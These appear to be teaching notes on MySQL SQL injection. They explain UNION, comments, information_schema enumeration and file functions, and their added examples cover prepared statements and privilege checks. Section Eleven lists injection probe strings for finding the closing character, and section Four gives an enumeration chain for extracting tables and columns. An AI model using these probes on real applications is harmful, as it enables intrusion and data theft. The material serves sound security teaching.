First, functions
1. VERSION() MySQL version
2. USER() database user name
3. DATABASE() current database name
4. @@datadir path of the data directory
5. @@version_compile_os operating system the server was built for
6. CURRENT_USER() the account whose privileges are in effect (shows what the session is allowed to do)
7. LOAD_FILE() reads a file on the database server
8. INTO OUTFILE / INTO DUMPFILE writes query output to a file on the database server; like LOAD_FILE(), both require the FILE privilege and are limited by the secure_file_priv setting
9. GROUP_CONCAT(expr) concatenates all values of a group into one string, with a comma between each value
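The functions above in one query, followed by the checks a DBA runs on the two file functions. This is an added example, not part of the original notes; it uses only built-in MySQL functions, variables and information_schema tables.

```sql
-- Added example (not from the original notes): the information functions
-- above in one query, plus the checks a DBA runs on the file functions.
SELECT VERSION(), DATABASE(), @@datadir, @@version_compile_os;

-- USER() is the name/host the client connected as; CURRENT_USER() is the
-- account MySQL matched it to, i.e. the one whose privileges apply.
-- They differ when the matching grant uses a wildcard host such as 'app'@'%'.
SELECT USER(), CURRENT_USER();

-- LOAD_FILE() and INTO OUTFILE / DUMPFILE both need the FILE privilege and
-- are bound by secure_file_priv: '' = no restriction, a path = only that
-- directory, NULL = both disabled. A hardened server shows a path or NULL.
SELECT @@secure_file_priv;

-- Which accounts hold FILE at all? Ideally no application account does.
SELECT grantee
FROM information_schema.user_privileges
WHERE privilege_type = 'FILE';
```

The last two queries are the ones worth scheduling: a web application account that holds FILE on a server with an empty secure_file_priv turns any injection into file read and write.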
Second, comments: # and -- can be used. In a URL, -- is written as --+ so that the + decodes to the space that -- requires, and # must be URL-encoded as %23.
Third, the UNION operator
UNION merges the result sets of two or more SELECT statements. Every SELECT inside the UNION must return the same number of columns, the columns must have compatible data types, and the columns must appear in the same order in each SELECT.
SQL UNION syntax:
SELECT column_name(s) FROM table_name1
UNION
SELECT column_name(s) FROM table_name2
Note: by default UNION returns only distinct rows. To keep duplicate rows, use UNION ALL.
SQL UNION ALL syntax:
SELECT column_name(s) FROM table_name1
UNION ALL
SELECT column_name(s) FROM table_name2
In addition, the column names of the UNION result set are always those of the first SELECT statement in the UNION.
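The three rules above worked through on two constructed temporary tables. This is an added example, not from the original notes; the table and column names are made up.

```sql
-- Added example (not from the original notes): UNION vs UNION ALL on two
-- constructed temporary tables.
CREATE TEMPORARY TABLE t1 (id INT, name VARCHAR(20));
CREATE TEMPORARY TABLE t2 (id INT, name VARCHAR(20));
INSERT INTO t1 VALUES (1, 'alice'), (2, 'bob');
INSERT INTO t2 VALUES (2, 'bob'), (3, 'carol');

-- UNION removes duplicate rows: 3 rows (1 alice, 2 bob, 3 carol).
SELECT id, name FROM t1
UNION
SELECT id, name FROM t2;

-- UNION ALL keeps duplicates: 4 rows (2 bob appears twice).
SELECT id, name FROM t1
UNION ALL
SELECT id, name FROM t2;

-- The result's column names come from the first SELECT:
-- the header reads user_id, user_name, not id, name.
SELECT id AS user_id, name AS user_name FROM t1
UNION
SELECT id, name FROM t2;

-- Column counts must match. This statement fails with
-- ERROR 1222 (21000): The used SELECT statements have a different number of columns
SELECT id, name FROM t1
UNION
SELECT id FROM t2;
```

Error 1222 is the reason an attacker has to work out the column count of the original query before a UNION can be appended; an application that shows raw database errors to the user hands over that information for free, so map database errors to a generic page and log the detail server-side.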
Four, MySQL has a system database, INFORMATION_SCHEMA,
that stores metadata about every database, table and column. In general, by querying these tables an injection can be carried through to completion. The general process is as follows.
Guess the databases
SELECT schema_name FROM information_schema.schemata
Guess the tables of one database
SELECT table_name FROM information_schema.tables WHERE table_schema = 'xxxxx'
Guess all the columns of one table
SELECT column_name FROM information_schema.columns WHERE table_name = 'xxxxx'
Get the contents of a column
SELECT <column_name> FROM <database_name>.<table_name>
Reference exercises for the above: Less-1 to Less-4
Five, comments
1. Single-line comments: the comment text follows # directly; -- must be followed by a space.
2. Multi-line comments: /* */, and the body may span lines.
3. Inline comments: the inline comment /*! ... */ is a feature MySQL added specifically to stay compatible with other databases.
So that SQL exported from MySQL can still be used by other databases, MySQL-specific syntax is placed inside /*! ... */;
when such statements are run on a database that does not support that syntax they are skipped as comments, while MySQL itself recognises and executes them.
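The three comment forms side by side, including the version-conditional variant of the inline comment. This is an added example, not from the original notes.

```sql
-- Added example (not from the original notes): the comment forms MySQL accepts.
SELECT 1; # a hash comment runs to the end of the line
SELECT 2; -- a double-dash comment needs a space (or tab) after the dashes
SELECT 3 /* a block comment
             may span several lines */;

-- Inline comment: other databases see a comment and skip the body; MySQL
-- executes it. This returns 2 on MySQL and 1 elsewhere.
SELECT 1 /*! + 1 */;

-- With a version number the body runs only on servers at or above that
-- version (5.00.00 here); an older server returns just the first column.
SELECT 'always' /*!50000 , 'only on 5.0 and later' */;
```

The inline form matters for detection: a filter that strips everything between /* and */ before inspecting a query will remove text that the server is going to execute, so inspection should be done on the statement as MySQL parses it, not on a comment-stripped copy.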
Six, the ORDER BY statement
1. ORDER BY sorts the result set by the specified column.
2. ORDER BY sorts records in ascending order by default.
Seven, string concatenation functions
1. CONCAT(str1, str2, ...) joins the arguments directly
2. GROUP_CONCAT(str1, str2, ...) joins the values of a group, using a comma as the separator
3. CONCAT_WS(sep, str1, str2, ...) uses the first argument as the separator
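The three functions on a constructed table, with the two behaviours that most often surprise people: NULL handling and the GROUP_CONCAT length limit. This is an added example, not from the original notes; the accounts table is made up.

```sql
-- Added example (not from the original notes); the table is constructed.
CREATE TEMPORARY TABLE accounts (id INT, username VARCHAR(20), role VARCHAR(20));
INSERT INTO accounts VALUES (1, 'alice', 'admin'), (2, 'bob', 'user'), (3, 'carol', 'user');

-- CONCAT joins its arguments with nothing between them: 'alice:admin'
SELECT CONCAT(username, ':', role) FROM accounts WHERE id = 1;

-- CONCAT_WS uses the first argument as the separator: '1|alice|admin'
SELECT CONCAT_WS('|', id, username, role) FROM accounts WHERE id = 1;

-- CONCAT returns NULL if any argument is NULL; CONCAT_WS skips NULLs.
-- Result: NULL, 'a-b'
SELECT CONCAT('a', NULL), CONCAT_WS('-', 'a', NULL, 'b');

-- GROUP_CONCAT collapses rows into one value, comma-separated by default:
-- 'alice,bob,carol'
SELECT GROUP_CONCAT(username) FROM accounts;

-- Separator and ordering are optional clauses: 'carol;bob;alice'
SELECT GROUP_CONCAT(username ORDER BY username DESC SEPARATOR ';') FROM accounts;

-- Caveat: the result is cut off at group_concat_max_len bytes (default 1024),
-- so a long concatenation silently loses the tail.
SELECT @@group_concat_max_len;
```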
Eight, information_schema
Examples:
SELECT schema_name FROM information_schema.schemata;
SELECT table_name FROM information_schema.tables WHERE table_schema = 'zzcms';
SELECT column_name FROM information_schema.columns WHERE table_schema = 'zzcms' AND table_name = 'zzcms_zx';
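The full enumeration chain from section Four and the examples above, run end to end against a constructed schema, plus the two catalog queries a defender uses to check what an account can see. This is an added example, not from the original notes; demo_app, users and the column names are assumed names for illustration.

```sql
-- Added example (not from the original notes). 'demo_app', 'users' and the
-- column names are constructed for illustration.
CREATE DATABASE IF NOT EXISTS demo_app;
CREATE TABLE IF NOT EXISTS demo_app.users (
  id INT PRIMARY KEY,
  username VARCHAR(32),
  email VARCHAR(64)
);
INSERT INTO demo_app.users VALUES (1, 'alice', 'alice@example.com'), (2, 'bob', 'bob@example.com');

-- 1. List databases. Only databases the current account holds some
--    privilege on are listed, so a least-privilege account sees its own.
SELECT schema_name FROM information_schema.schemata;

-- 2. List the tables of one database (information_schema.tables, not .schemata).
SELECT table_name FROM information_schema.tables
WHERE table_schema = 'demo_app';

-- 3. List the columns of one table. Filter on both schema and table name,
--    because the same table name can exist in several databases.
SELECT column_name, data_type FROM information_schema.columns
WHERE table_schema = 'demo_app' AND table_name = 'users';

-- 4. Read a column. GROUP_CONCAT folds all rows into one value: 'alice,bob'
SELECT GROUP_CONCAT(username) FROM demo_app.users;

-- Defender's check: which accounts can reach which schemas? An application
-- account should appear once, against its own schema, with no global grants.
SELECT grantee, table_schema, privilege_type
FROM information_schema.schema_privileges
ORDER BY grantee, table_schema;
SELECT grantee, privilege_type
FROM information_schema.user_privileges
ORDER BY grantee;
```

Because step 1 only returns databases the account can already touch, scoping the web application's account to its own schema limits what steps 2 to 4 can ever reveal even when an injection exists.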
Nine, classification of SQL injection
Ten, steps of injection based on UNION queries
Eleven, determining whether injection exists and what the closing character is
1. id=1' abnormal
id=1 and 1=1--+ normal
id=1 and 1=2--+ abnormal
Conclusion: very likely numeric SQL injection
PS: the single quote plays a special role here: it acts as a delimiter
2. id=1' abnormal
id=1' and 1=1--+ normal
id=1' and 1=2--+ abnormal
Conclusion: very likely single-quote string SQL injection
3. id=1' abnormal
id=1" and 1=1--+ normal
id=1" and 1=2--+ abnormal
Conclusion: very likely double-quote string SQL injection
4. id=1' abnormal
id=1) and 1=1--+ normal
id=1) and 1=2--+ abnormal
Conclusion: very likely parenthesised numeric SQL injection
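Why the 1=1 / 1=2 pair in step 1 changes the page, and the fix, shown inside MySQL itself with server-side prepared statements. This is an added example, not from the original notes: the application-layer string building that the notes assume is emulated with CONCAT, and the products table is constructed.

```sql
-- Added example (not from the original notes). The products table is
-- constructed; CONCAT stands in for the application gluing the URL
-- parameter into its query text.
CREATE TEMPORARY TABLE products (id INT, name VARCHAR(20));
INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');

-- Vulnerable pattern: the parameter value becomes part of the SQL text.
-- With @input = '1' this returns the widget row.
SET @input = '1';
SET @sql = CONCAT('SELECT id, name FROM products WHERE id = ', @input);
PREPARE q FROM @sql; EXECUTE q; DEALLOCATE PREPARE q;

-- Same code with the step-1 probe. The condition is now parsed as SQL,
-- so the row disappears: that is the "1=1 normal / 1=2 abnormal" signal.
SET @input = '1 and 1=2';
SET @sql = CONCAT('SELECT id, name FROM products WHERE id = ', @input);
PREPARE q FROM @sql; EXECUTE q; DEALLOCATE PREPARE q;   -- no rows

-- Fix: bind the value through a placeholder. The text is compared to id
-- as a value (MySQL converts '1 and 1=2' to the number 1 with a warning)
-- and is never parsed as SQL, so the widget row comes back unchanged.
SET @input = '1 and 1=2';
PREPARE q FROM 'SELECT id, name FROM products WHERE id = ?';
EXECUTE q USING @input;
DEALLOCATE PREPARE q;

-- Tighter still for a numeric id: reject anything that is not an integer
-- before it reaches the query, e.g. @input REGEXP '^[0-9]+$'.
SELECT @input REGEXP '^[0-9]+$' AS input_is_integer;   -- 0 for the probe
```

The same placeholder approach exists in every client library (PDO prepared statements, JDBC PreparedStatement, Python DB-API parameters); the in-server form is used here only so the whole demonstration runs in the MySQL client.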
SQL injection notes, day one, teacher Zhangzhenfeng